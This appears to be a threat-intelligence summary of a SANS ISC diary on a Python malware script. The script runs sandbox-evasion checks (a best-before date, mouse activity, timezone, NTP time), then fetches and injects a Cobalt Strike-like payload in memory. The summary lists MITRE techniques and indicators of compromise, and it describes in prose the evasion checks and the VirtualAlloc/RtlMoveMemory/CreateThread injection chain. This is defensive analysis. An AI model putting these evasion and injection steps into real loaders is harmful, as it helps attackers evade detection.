A Python-based malicious script uses a best-before date to delay execution, performs anti-analysis checks, and downloads and injects a payload in memory, resembling a Cobalt Strike beacon. The article walks through the time and environment checks (date, mouse activity, timezone, NTP) and the in-memory injection chain, noting a VT score and a SHA256 hash for the sample. #CobaltStrike #AntiVM #AntiDebugger #ProcessInjection #InMemoryExecution #NTP #RFC1918 #VirusTotal
Keypoints
- The sample is a malicious Python script that will execute only before a specified date (Jun 10 in the example).
- Its core behavior is to fetch a payload from a remote site, inject it in memory, and start a new thread.
- The payload appears to be a Cobalt Strike beacon or Cobalt Strike-like payload, evidenced by the fetch/inject pattern.
- Anti-analysis checks are implemented: expiration date, mouse activity, mouse movement, timezone checks, and an NTP-based time check.
- Memory-injection steps are explicit: allocate memory with VirtualAlloc, copy payload with RtlMoveMemory, and execute via CreateThread/WaitForSingleObject.
- The payload fetch URL is built with a random string in the URI, and a sample shows a SHA256 hash and VT score for the sample.
- References include a VirusTotal file page and the ASN/SANS ISC diary describing the sample; the sample reportedly scores 12/71 on VT.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The malware fetches a payload from a remote site and then injects it in memory. “If all these conditions are met, the payload is fetched and injected in memory.”
- [T1055] Process Injection – The payload is copied into memory and executed within the process. “Allocate some memory with VirtualAlloc() and 0x40 (PAGE_EXECUTE_READWRITE) … Copy the payload in the newly allocated memory with RtlMoveMemory() … Launch it with CreateThread() and WaitForSingleObject().”
- [T1497] Virtualization/Sandbox Evasion – Anti-VM and anti-debugging checks are implemented to evade analysis. “The most interesting part is related to the anti-VM and anti-debugging techniques.”
- [T1056] Input Capture – The script uses GetAsyncKeyState to detect mouse activity and clicks as part of environment checks. “GetAsyncKeyState() is used to detect if, respectively, the left and right mouse button is used[1].”
Indicators of Compromise
- [File hash] eca1cd9ce317ada991e0a037e70c15e471e9076faa58adf682efbfe22ffa747f – sample SHA256 hash referenced for the payload/beacon.
- [URL] https://www.virustotal.com/gui/file/eca1cd9ce317ada991e0a037e70c15e471e9076faa58adf682efbfe22ffa747f – VirusTotal page showing the sample’s VT score.
- [Domain] us.pool.ntp.org – domain used for NTP-based time verification to bypass sandbox/time checks.
- [Domain] (RFC1918 private IP address used for payload hosting) – referenced as the IP space the payload might be fetched from (private address range).
Read more: https://isc.sans.edu/diary/rss/30988